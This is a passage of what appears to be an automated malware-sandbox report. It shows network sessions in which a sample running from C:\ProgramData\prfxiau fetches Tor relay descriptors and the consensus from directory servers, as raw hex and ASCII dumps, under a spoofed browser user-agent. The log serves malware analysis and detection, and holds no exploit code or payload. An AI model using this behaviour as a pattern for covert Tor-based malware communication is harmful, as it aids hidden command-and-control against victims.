31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 31 39 3a 32 35 3a 35 35 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 38 38 38 35 20 45 41 36 46 20 37 34 41 36 20 39 34 38 32 20 35 42 31 33 20 42 38 41 37 20 30 38 30 46 20 36 43 46 31 20 36 34 44 46 20 37 34 46 42 0a 75 70 74 69 6d 65 20 31 39 32 32 33 30 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 36 30 35 36 32 35 35 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 45 46 34 44 32 39 38 31 32 43 45 44 32 35 38 41 45 36 38 35 33 30 32 35 34 43 39 31 46 41 31 38 45 42 42 45 43 43 30 34 20 66 58 38 38 55 33 65 73 39 42 63 4b 4f 48 31 74 57 55 57 34 59 62 6a 4b 70 58 39 30 6f 36 65 6a 56 5a 4b 72 56 39 74 44 68 63 59 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 4b 6f 6c 6d 4d 4b 31 4d 4a 6a 51 37 6b 44 53 53 73 58 58 7a 48 79 6c 45 71 31 75 57 76 57 61 37 79 39 6a 71 2f 2f 67 74 47 6b 78 30 6a 6f 41 2b 4d 57 50 54 32 30 0a 42 74 79 69 64 4f 53 5a 32 71 67 4e 31 64 2f 33 55 49 6c 4b 49 78 69 4d 37 4c 61 57 61 66 63 76 76 75 4c 73 57 55 65 61 79 5a 47 73 6b 39 56 79 71 59 65 67 30 6e 6a 69 64 50 47 32 37 33 2f 32 0a 37 49 50 31 65 7a 4e 37 48 2f 6a 6d 4e 4f 75 47 39 4a 75 77 4c 71 44 38 41 4d 79 52 75 75 66 73 66 38 48 66 43 45 74 75 57 48 58 2f 4a 2b 49 32 46 5a 79 4e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                          Data Ascii: router Unnamed 144.217.95.12 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxdhAV5MOzsld0rz3t5tchwkM5nEJ8012BrKBYKco8J1/2GBAQAgBAAllfN6HZ8Ms9QYSrJ6yafNIUC93NIk7oPIqTKPuZ5aLz2mk3yQABQxxy+1fHaR2jL3SBjfL3v60oSkwkoZolZQ+lqzc35LtlfT7baQiwdXosW9oup92Qt4CpdV6eAotgM=-----END ED25519 CERT-----master-key-ed25519 JZXzeh2fDLPUGEqyesmnzSFAvdzSJO6DyKkyj7meWi8or-address [2607:5300:201:3000::49be]:9001platform Tor 0.4.7.7 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 19:25:55fingerprint 8885 EA6F 74A6 9482 5B13 B8A7 080F 6CF1 64DF 74FBuptime 192230bandwidth 1073741824 1073741824 16056255extra-info-digest EF4D29812CED258AE68530254C91FA18EBBECC04 fX88U3es9BcKOH1tWUW4YbjKpX90o6ejVZKrV9tDhcYonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMKolmMK1MJjQ7kDSSsXXzHylEq1uWvWa7y9jq//gtGkx0joA+MWPT20BtyidOSZ2qgN1d/3UIlKIxiM7LaWafcvvuLsWUeayZGsk9VyqYeg0njidPG273/27IP1ezN7H/jmNOuG9JuwLqD8AMyRuufsf8HfCEtuWHX/J+I2FZyNAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          18192.168.2.349715151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:49.339025021 CET2729OUTGET /tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15ab HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:49.441062927 CET2731INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:49 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:49 GMT
                          Data Raw: 72 6f 75 74 65 72 20 38 34 31 32 30 33 34 31 30 33 37 38 30 32 33 37 20 32 30 39 2e 31 34 31 2e 33 37 2e 39 34 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 61 4c 41 65 53 79 6a 35 7a 47 4c 76 6e 7a 72 59 69 6c 67 6a 71 75 50 48 52 4b 5a 37 63 6d 34 63 57 6d 39 71 35 52 53 4e 73 63 4d 65 44 65 41 51 41 67 42 41 42 64 4b 72 4e 74 0a 4d 69 34 61 42 4f 6d 70 31 74 6e 79 48 4b 68 62 53 59 63 37 55 7a 4b 37 6a 51 4d 4b 59 7a 37 6c 70 4e 52 4a 4b 36 38 62 48 34 35 4c 50 41 37 33 74 34 65 4c 47 67 4b 31 6d 6f 66 4b 77 75 30 48 0a 38 71 30 2f 38 4d 43 4e 68 2f 78 75 5a 4f 2f 4d 71 4c 74 74 57 62 49 32 42 61 61 64 59 30 45 35 35 6b 43 46 74 4f 6d 51 59 45 79 64 4f 46 76 62 47 41 65 33 6f 4b 61 33 56 41 34 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 58 53 71 7a 62 54 49 75 47 67 54 70 71 64 62 5a 38 68 79 6f 57 30 6d 48 4f 31 4d 79 75 34 30 44 43 6d 4d 2b 35 61 54 55 53 53 73 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 34 3a 30 33 3a 34 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 32 44 38 20 33 32 46 30 20 30 32 44 34 20 43 41 33 44 20 32 35 41 44 20 44 41 32 43 20 42 42 42 32 20 44 30 39 45 20 45 34 31 41 20 31 35 41 42 0a 75 70 74 69 6d 65 20 33 39 33 38 35 39 38 0a 62 61 6e 64 77 69 64 74 68 20 33 30 37 32 30 30 30 20 31 30 37 33 37 34 31 38 32 34 20 37 36 32 35 35 37 39 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 46 35 31 41 46 42 32 34 46 44 45 32 35 33 43 30 46 30 42 45 46 32 37 42 41 45 38 33 46 42 45 30 38 46 33 36 42 43 38 39 20 33 68 6d 57 74 54 44 36 43 68 49 41 47 6d 73 4f 4a 43 48 37 7a 6a 4f 62 33 77 58 47 4a 42 2b 57 59 56 4f 48 6c 6a 55 7a 33 35 51 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 32 4a 31 34 33 34 4f 4e 63 41 49 37 70 75 37 33 51 35 41 38 56 64 42 4f 69 61 63 35 33 59 74 46 62 31 78 44 64 43 6a 31 57 4d 4d 65 52 46 76 4d 51 44 4a 45 58 36 0a 38 71 72 48 50 6f 45 31 63 4e 4e 32 59 6e 44 6f 74 4f 7a 76 4e 62 64 4a 36 79 69 32 62 6a 5a 61 41 62 31 6d 64 49 52 43 6c 56 6f 4b 38 49 41 31 5a 30 41 79 58 72 51 76 53 57 61 37 6d 7a 31 36 0a 47 2f 32 6e 39 6f 71 44 47 79 39 77 67 78 2b 57 6b 45 42 41 46 6e 33 37 39 70 55 34 78 78 57 41 42 34 4b 6d 4f 46 31 2f 49 67 2f 34 75 73 43 63 43 57 55 64 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 39 55 41
                          Data Ascii: router 8412034103780237 209.141.37.94 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxaLAeSyj5zGLvnzrYilgjquPHRKZ7cm4cWm9q5RSNscMeDeAQAgBABdKrNtMi4aBOmp1tnyHKhbSYc7UzK7jQMKYz7lpNRJK68bH45LPA73t4eLGgK1mofKwu0H8q0/8MCNh/xuZO/MqLttWbI2BaadY0E55kCFtOmQYEydOFvbGAe3oKa3VA4=-----END ED25519 CERT-----master-key-ed25519 XSqzbTIuGgTpqdbZ8hyoW0mHO1Myu40DCmM+5aTUSSsplatform Tor 0.4.7.10 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 04:03:47fingerprint 02D8 32F0 02D4 CA3D 25AD DA2C BBB2 D09E E41A 15ABuptime 3938598bandwidth 3072000 1073741824 7625579extra-info-digest F51AFB24FDE253C0F0BEF27BAE83FBE08F36BC89 3hmWtTD6ChIAGmsOJCH7zjOb3wXGJB+WYVOHljUz35Qonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAK2J1434ONcAI7pu73Q5A8VdBOiac53YtFb1xDdCj1WMMeRFvMQDJEX68qrHPoE1cNN2YnDotOzvNbdJ6yi2bjZaAb1mdIRClVoK8IA1Z0AyXrQvSWa7mz16G/2n9oqDGy9wgx+WkEBAFn379pU4xxWAB4KmOF1/Ig/4usCcCWUdAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAN9UA


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          19192.168.2.349719131.188.40.18980C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:53.232637882 CET2745OUTGET /tor/status-vote/current/consensus HTTP/1.0
                          Host: 131.188.40.189
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:53.252861023 CET2746INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:53 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Sun, 11 Dec 2022 09:00:00 GMT
                          Vary: X-Or-Diff-From-Consensus
                          Data Raw: 6e 65 74 77 6f 72 6b 2d 73 74 61 74 75 73 2d 76 65 72 73 69 6f 6e 20 33 0a 76 6f 74 65 2d 73 74 61 74 75 73 20 63 6f 6e 73 65 6e 73 75 73 0a 63 6f 6e 73 65 6e 73 75 73 2d 6d 65 74 68 6f 64 20 33 32 0a 76 61 6c 69 64 2d 61 66 74 65 72 20 32 30 32 32 2d 31 32 2d 31 31 20 30 38 3a 30 30 3a 30 30 0a 66 72 65 73 68 2d 75 6e 74 69 6c 20 32 30 32 32 2d 31 32 2d 31 31 20 30 39 3a 30 30 3a 30 30 0a 76 61 6c 69 64 2d 75 6e 74 69 6c 20 32 30 32 32 2d 31 32 2d 31 31 20 31 31 3a 30 30 3a 30 30 0a 76 6f 74 69 6e 67 2d 64 65 6c 61 79 20 33 30 30 20 33 30 30 0a 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 73 20 30 2e 34 2e 35 2e 36 2c 30 2e 34 2e 35 2e 37 2c 30 2e 34 2e 35 2e 38 2c 30 2e 34 2e 35 2e 39 2c 30 2e 34 2e 35 2e 31 30 2c 30 2e 34 2e 35 2e 31 31 2c 30 2e 34 2e 35 2e 31 32 2c 30 2e 34 2e 35 2e 31 34 2c 30 2e 34 2e 35 2e 31 35 2c 30 2e 34 2e 37 2e 37 2c 30 2e 34 2e 37 2e 38 2c 30 2e 34 2e 37 2e 31 30 2c 30 2e 34 2e 37 2e 31 31 2c 30 2e 34 2e 37 2e 31 32 0a 73 65 72 76 65 72 2d 76 65 72 73 69 6f 6e 73 20 30 2e 34 2e 35 2e 36 2c 30 2e 34 2e 35 2e 37 2c 30 2e 34 2e 35 2e 38 2c 30 2e 34 2e 35 2e 39 2c 30 2e 34 2e 35 2e 31 30 2c 30 2e 34 2e 35 2e 31 31 2c 30 2e 34 2e 35 2e 31 32 2c 30 2e 34 2e 35 2e 31 34 2c 30 2e 34 2e 35 2e 31 35 2c 30 2e 34 2e 37 2e 37 2c 30 2e 34 2e 37 2e 38 2c 30 2e 34 2e 37 2e 31 30 2c 30 2e 34 2e 37 2e 31 31 2c 30 2e 34 2e 37 2e 31 32 0a 6b 6e 6f 77 6e 2d 66 6c 61 67 73 20 41 75 74 68 6f 72 69 74 79 20 42 61 64 45 78 69 74 20 45 78 69 74 20 46 61 73 74 20 47 75 61 72 64 20 48 53 44 69 72 20 4d 69 64 64 6c 65 4f 6e 6c 79 20 4e 6f 45 64 43 6f 6e 73 65 6e 73 75 73 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c 65 20 53 74 61 6c 65 44 65 73 63 20 53 79 62 69 6c 20 56 32 44 69 72 20 56 61 6c 69 64 0a 72 65 63 6f 6d 6d 65 6e 64 65 64 2d 63 6c 69 65 6e 74 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 63 6f 6d 6d 65 6e 64 65 64 2d 72 65 6c 61 79 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 33 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 71 75 69 72 65 64 2d 63 6c 69 65 6e 74 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 4c 69 6e 6b 3d 34 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 71 75 69 72 65 64 2d 72 65 6c 61 79 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 33 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 70 61 72 61 6d 73 20 43 69 72 63 75 69 74 50 72 69 6f 72 69 74 79 48 61 6c 66 6c 69 66 65 4d 73 65 63 3d 33 30 30 30 30 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 42 75 72 73 74 3d 36 30 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61
                          Data Ascii: network-status-version 3vote-status consensusconsensus-method 32valid-after 2022-12-11 08:00:00fresh-until 2022-12-11 09:00:00valid-until 2022-12-11 11:00:00voting-delay 300 300client-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12server-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Validrecommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCrea
                          Dec 11, 2022 09:25:53.252938032 CET2747INData Raw: 74 69 6f 6e 45 6e 61 62 6c 65 64 3d 31 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 4d 69 6e 43 6f 6e 6e 65 63 74 69 6f 6e 73 3d 32 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 52 61 74 65 3d 32 20 44 6f 53 43 6f 6e 6e 65
                          Data Ascii: tionEnabled=1 DoSCircuitCreationMinConnections=2 DoSCircuitCreationRate=2 DoSConnectionEnabled=1 DoSConnectionMaxConcurrentCount=50 DoSRefuseSingleHopClientRendezvous=1 ExtendByEd25519ID=1 KISTSchedRunInterval=2 NumNTorsPerTAP=100 UseOptimisti
                          Dec 11, 2022 09:25:53.253205061 CET2749INData Raw: 65 5f 70 65 72 63 65 6e 74 3d 35 30 30 20 73 65 6e 64 6d 65 5f 65 6d 69 74 5f 6d 69 6e 5f 76 65 72 73 69 6f 6e 3d 31 0a 73 68 61 72 65 64 2d 72 61 6e 64 2d 70 72 65 76 69 6f 75 73 2d 76 61 6c 75 65 20 38 20 4f 55 58 73 33 33 5a 36 6a 77 43 61 43
                          Data Ascii: e_percent=500 sendme_emit_min_version=1shared-rand-previous-value 8 OUXs33Z6jwCaC7+01M0edsV3bfQTozE0XT1G+S9nMBM=shared-rand-current-value 8 zXIuCMixcVdQiw7MqOKRh96/AoG3SQusUgMfgw4Gezk=dir-source dannenberg 0232AF901C31A04EE9848595AF9BB7620D
                          Dec 11, 2022 09:25:53.253252029 CET2750INData Raw: 36 36 2e 33 33 2e 34 35 20 38 30 20 34 34 33 0a 63 6f 6e 74 61 63 74 20 65 6d 61 69 6c 3a 75 73 75 72 61 5b 5d 73 61 62 6f 74 61 67 65 2e 6f 72 67 20 75 72 6c 3a 68 74 74 70 73 3a 2f 2f 33 38 36 62 73 64 2e 6e 65 74 20 70 72 6f 6f 66 3a 75 72 69
                          Data Ascii: 66.33.45 80 443contact email:usura[]sabotage.org url:https://386bsd.net proof:uri-rsa abuse:abuse[]sabotage.net twitter:adejoode ciissversion:2vote-digest 69686C901A02C875F25F646E9DE068CADA61BFB9dir-source gabelmoo ED03BB616EB2F60BEC8015111
                          Dec 11, 2022 09:25:53.253294945 CET2751INData Raw: 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 77 20 42 61 6e 64 77 69 64 74 68 3d 33 31 30 30 30 0a 70 20 61 63 63 65 70 74 20 32 30 2d 32 33 2c 34 33 2c 35 33 2c 37 39 2d 38 31 2c 38 38 2c 31 31 30 2c 31 34 33 2c 31 39 34 2c 32 32 30 2c 33
                          Data Ascii: ding=2 Relay=1-4w Bandwidth=31000p accept 20-23,43,53,79-81,88,110,143,194,220,389,443,464,531,543-544,554,563,636,706,749,873,902-904,981,989-995,1194,1220,1293,1500,1533,1677,1723,1755,1863,2082-2083,2086-2087,2095-2096,2102-2104,3128,3389
                          Dec 11, 2022 09:25:53.253340006 CET2753INData Raw: 76 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 0a 70 72 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53
                          Data Ascii: v Tor 0.4.7.11pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=11000p reject 1-65535r suominode AFYmkM8z9TfE9MlYdlX3Rphoxzo St+sEFoocvWpEPAG1fBXF
                          Dec 11, 2022 09:25:53.253385067 CET2754INData Raw: 20 5b 32 61 30 33 3a 65 36 30 30 3a 31 30 30 3a 3a 37 33 5d 3a 38 30 38 30 0a 73 20 45 78 69 74 20 46 61 73 74 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c 65 20 56 61 6c 69 64 0a 76 20 54 6f 72 20 30 2e 34 2e 38 2e 30 2d 61 6c 70 68 61 2d 64 65 76
                          Data Ascii: [2a03:e600:100::73]:8080s Exit Fast Running Stable Validv Tor 0.4.8.0-alpha-devpr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=27000p accept 8
                          Dec 11, 2022 09:25:53.253427029 CET2755INData Raw: 4d 70 4f 73 50 77 4c 6e 4b 7a 4e 73 6a 64 6b 4d 51 20 32 30 32 32 2d 31 32 2d 31 30 20 32 30 3a 34 36 3a 30 32 20 31 39 39 2e 32 34 39 2e 32 33 30 2e 31 30 33 20 34 34 33 20 30 0a 61 20 5b 32 36 32 30 3a 37 3a 36 30 30 31 3a 3a 31 30 33 5d 3a 38
                          Data Ascii: MpOsPwLnKzNsjdkMQ 2022-12-10 20:46:02 199.249.230.103 443 0a [2620:7:6001::103]:80s Exit Fast Guard HSDir Running Stable V2Dir Validv Tor 0.4.7.10pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth
                          Dec 11, 2022 09:25:53.253469944 CET2757INData Raw: 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20
                          Data Ascii: =1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=24000p accept 20-21,43,53,79-81,88,110,143,220,389,443,464,531,543-544,554,636,706,749,873,902-904,981,989-993,995,1194,1220,1293,1500,153
                          Dec 11, 2022 09:25:53.253513098 CET2758INData Raw: 2e 37 2e 37 0a 70 72 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c
                          Data Ascii: .7.7pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=110p reject 1-65535r effiorg1984 AMzmqE5tY6GkLhBYObyO1dSxZmk 8OYcUi8kTKuY2BCX2ZaZN/s9v9w 202
                          Dec 11, 2022 09:25:53.273015022 CET2759INData Raw: 33 20 35 2e 39 2e 35 36 2e 32 34 39 20 34 30 38 30 20 30 0a 61 20 5b 32 61 30 31 3a 34 66 38 3a 31 36 31 3a 35 32 63 62 3a 3a 32 5d 3a 34 30 38 30 0a 73 20 46 61 73 74 20 48 53 44 69 72 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c 65 20 56 32 44 69
                          Data Ascii: 3 5.9.56.249 4080 0a [2a01:4f8:161:52cb::2]:4080s Fast HSDir Running Stable V2Dir Validv Tor 0.4.7.10pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Band


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          2192.168.2.34973764.185.227.156443C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          20192.168.2.34972177.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:00.144615889 CET5234OUTGET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:00.193409920 CET5235INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:00 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:00 GMT
                          Data Raw: 72 6f 75 74 65 72 20 74 72 61 6e 73 74 62 62 20 38 34 2e 31 35 35 2e 31 35 32 2e 38 32 20 31 34 30 37 34 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 56 36 41 51 46 56 4c 62 52 62 43 65 5a 36 30 34 50 32 74 44 38 70 49 42 47 51 4e 72 4f 74 6a 58 75 49 5a 4d 61 73 70 30 66 42 2f 63 36 51 41 51 41 67 42 41 42 6f 35 36 30 52 0a 52 39 45 47 6a 33 55 41 59 76 6a 50 76 64 75 61 70 56 57 49 4f 45 57 31 4f 6f 50 6a 70 45 47 4b 4f 36 41 5a 70 79 64 4a 56 59 6f 2f 32 31 32 34 79 4d 74 62 58 4e 43 74 68 74 64 77 71 4a 36 74 0a 67 73 76 70 56 72 74 70 65 4f 56 4d 6d 6c 4f 34 52 55 58 42 5a 5a 76 50 49 39 68 58 46 4e 52 77 67 65 38 37 68 7a 43 63 41 63 42 6d 51 74 70 68 58 36 30 5a 59 54 66 33 55 51 6b 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 61 4f 65 74 45 55 66 52 42 6f 39 31 41 47 4c 34 7a 37 33 62 6d 71 56 56 69 44 68 46 74 54 71 44 34 36 52 42 69 6a 75 67 47 61 63 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 